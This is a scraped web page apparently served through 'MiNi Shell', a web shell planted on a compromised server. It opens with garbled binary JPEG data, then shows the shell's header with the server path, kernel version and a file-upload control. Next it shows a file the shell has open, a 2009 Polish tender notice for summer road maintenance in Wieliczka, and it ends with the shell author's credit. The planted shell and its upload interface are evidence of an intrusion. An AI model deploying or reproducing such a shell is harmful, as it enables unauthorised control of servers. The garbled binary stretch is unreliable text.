JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090309/47581-N-2009.html

<p class="kh_header"><b>Wieliczka: Letnie utrzymanie dróg powiatowych na terenie Powiatu Wielickiego w 2009r</b><br>
<b>Numer ogłoszenia: 47581 - 2009; data zamieszczenia: 09.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Wieliczce , ul. Sienkiewicza 13A, 32-020 Wieliczka, woj. małopolskie, tel. 012 2882874, faks 012 2500378.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdp.wieliczka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa sam. ter. Powiatu Wielickiego - Zarząd Dróg Powiatowych w Wieliczce.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Letnie utrzymanie dróg powiatowych na terenie Powiatu Wielickiego w 2009r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Letnie utrzymanie dróg powiatowych, na terenie Powiatu Wielickiego w 2009 r.
Zakres robót obejmuje:
a) ręczną konserwację rowów przydrożnych z namułu i mechaniczny odwóz ziemi i namułu,
b) mechaniczne odtworzenie rowów,
c) mechaniczne ścinanie poboczy i uzupełnianie poboczy wysiewką,
d) rozbiórkę uszkodzonego i wykonanie nowego przepustu rurowego śr 50 cm,
e) odtworzenie nawierzchni,
f) umocnienie skarp i dna wykopów,
g) czyszczenie przepustów.

Szczegółowy zakres robót określają:
- Kosztorys ofertowy - zał. C do SIWZ,
- Specyfikacja Techniczna Wykonania i Odbioru Robót (ST)- zał. D do SIWZ.
Miejsce i zakres wykonywanych prac wskaże każdorazowo Zamawiający. Wykonawca powinien przystąpić do ich wykonania w ciągu 48 godzin od wskazania,  a w szczególnych przypadkach (zagrażających bezpieczeństwu w ruchu drogowym) - do godziny od powiadomienia telefonicznie lub faksem. 
Jeżeli Wykonawca nie przystąpi w w/w terminie do uzgodnionych prac to Zamawiający może zlecić wykonanie zastępcze na koszt Wykonawcy.
Rozliczenie robót będzie kosztorysem powykonawczym tzn. cena jednostkowa przedstawiona w ofercie x ilość faktycznie wykonanych robót.
Na Wykonawcy spoczywa obowiązek, aby zapoznał się z miejscem realizacji przedmiotu zamówienia, a także zdobył na własną odpowiedzialność i ryzyko wszelkie informacje, które mogą być potrzebne do przygotowania oferty. 
Wszystkie prace powinny być wykonane zgodnie z Specyfikacją Techniczną, obowiązującymi przepisami oraz zasadami sztuki i wiedzy inżynierskiej.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.51-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca wnosi wadium w wysokości 5 000,00 zł. (słownie: pięć tysięcy zł. 00/100) najpóźniej do dnia 30.03.2009 r. do godz. 10:00.
Wadium może być wnoszone w:
a)pieniądzu, 
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)gwarancjach bankowych,
d)gwarancjach ubezpieczeniowych,
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zmianami).
Wykonawca sam wybiera sobie formę wadium.
W przypadku wyboru pieniężnej formy, wadium należy wpłacić przelewem na konto Zarządu Dróg Powiatowych  Nr 98-86190006-0010-0200-7168-0002
Wadium wniesione w pieniądzu na konto ZDP musi wpłynąć na rachunek Zamawiającego najpóźniej do dnia 30.03.2009 r.  do godz. 10:00. 
W przypadku wnoszenia wadium w formie niepieniężnej należy je umieścić 
w oryginale, w kopercie wraz z ofertą (ale nie łączyć trwale z pozostałymi dokumentami), a kserokopię poświadczoną za zgodność z oryginałem przez osobę(-y) uprawnioną (-e) dołączyć do oferty. Wymagana ważność tej formy wadium - 30 dni od terminu składania ofert.
Zamawiający niezwłocznie zwróci wadium z chwilą :
a.upływu terminu związania ofertą,
b.zawarcia umowy i wniesienia zabezpieczenia należytego wykonania umowy,
c.unieważnienia postępowania, jeżeli protesty zostały rozstrzygnięte lub upłynął termin do ich wnoszenia.
Zamawiający, z zastrzeżeniem ppkt. 11.11 SIWZ, zwróci wadium niezwłocznie na wniosek Wykonawcy,:
a.który wycofał ofertę przed upływem terminu składania ofert,
b.który został wykluczony z postępowania,
c.którego, oferta została odrzucona, 
Zamawiający żąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie Art. 46 ust. 2 pkt 2 i 3 uPzp, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami, wynikającymi z umowy rachunku bankowego, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli:
a.wykonawca w odpowiedzi na wezwanie do uzupełnienia oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 uPzP, lub pełnomocnictw nie złożył ich w określonym terminie, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie,  
b.wykonawca odmówi podpisania umowy na warunkach określonych w ofercie,
c.wykonawca nie wniósł wymaganego zabezpieczenia należytego wykonania umowy na zasadach określonych w Specyfikacji Istotnych Warunków Zamówienia,
d.zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1)posiadają uprawnienia do wykonywania działalności lub czynności określonej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 
a.wymagane jest wykonanie w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  robót budowlanych odpowiadających swoim rodzajem  i wartością robotom  budowlanym stanowiącym przedmiot zamówienia (należy wykazać co najmniej jedną robotę o wartości nie mniejszej niż 300 000,00 zł. brutto), z podaniem ich wartości  oraz daty i miejsca wykonania oraz załączenie dokumentów (referencji, protokołów odbioru itp.) potwierdzających, że roboty te zostały wykonane należycie.
b.wymagany jest kierownik robót posiadający uprawnienia budowlane do kierowania robotami w specjalności drogowej i załączenie uprawnień oraz aktualnego zaświadczenia z właściwej Izby samorządu zawodowego.
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych (przez wykonawcę, podmioty występujące wspólnie) dokumentów wymienionych w punkcie 9.2.3 Specyfikacji Istotnych Warunków Zamówienia, na zasadzie spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty i oświadczenia jakie należy załączyć do oferty to:
1)Wypełniony Formularz ofertowy z wykorzystaniem wzoru wg załącznika A,
2)Kosztorys ofertowy, wykonany metodą uproszczoną, na podstawie załączonego formularza stanowiącego załącznik C do SIWZ - będzie stanowić załącznik 1 do oferty.
3)W celu potwierdzenia spełniania warunków określonych w pkt. 8.1. SIWZ należy załączyć:
a.Oświadczenie, że Wykonawca nie podlega wykluczeniu, z postępowania na podstawie art. 24 ust.1 i 2  i spełnia wymogi art. 22 ust. 1, ustawy Prawo Zamówień Publicznych z wykorzystaniem wzoru Zał. 2 do SIWZ - będzie stanowić załącznik nr 2 do oferty,
b.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu do składania ofert - będzie stanowić załącznik 3 do oferty,
c.Wykaz wykonanych w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączenie dokumentów (referencji, protokołów odbioru itp.) potwierdzających, że roboty te zostały wykonane należycie (należy wykazać co najmniej jedną robotę o wartości nie mniejszej niż 300 000,00 zł. brutto), z wykorzystaniem wzoru Zał. 4 do SIWZ -  będzie stanowić załącznik 4 do oferty,
d.Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą realizować przedmiot zamówienia, ich kwalifikacje (doświadczenie), a także zakres wykonywanych czynności. Wymagany jest kierownik robót posiadający uprawnienia budowlane do kierowania robotami w specjalności drogowej oraz załączenie posiadanych przez niego uprawnień wraz z aktualnym zaświadczeniem, z właściwej Izby samorządu zawodowego, i wykaz części zamówienia, powierzonych podwykonawcom - będzie stanowić załącznik 5 do oferty.
e.Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie pkt. 3d SIWZ wykonawca wskazał osoby, którymi będzie dysponował  - będzie stanowić Załącznik 5a do oferty,
4)Pełnomocnictwo, jeżeli wykonawca jest reprezentowany w sposób inny, niż to wynika z zapisu we właściwym rejestrze lub w ewidencji działalności gospodarczej, zgodnie z art. 23 u.P.z.p. dotyczy także wykonawców występujących wspólnie - tj. konsorcjum, s.c., - będzie stanowić Załącznik 6 do oferty,
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty zgodnie z przepisami Rozporządzenia Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzaju dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form w jakich dokumenty mogą być składane (Dz. U. z 2006 r. nr 87, poz. 605) oraz Rozporządzenia Prezesa Rady Ministrów z dnia 16 października 2008 r. zmieniającego Rozporządzenie w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U.  Nr 188, poz. 1155).
Dokumenty sporządzone w języku obcym muszą zostać złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdp.wieliczka.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Wieliczce, ul. Sienkiewicza 13A,32-020 Wieliczka, parter, pokój 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2009 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Wieliczce, ul. Sienkiewicza 13A,32-020 Wieliczka, parter, pokój 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com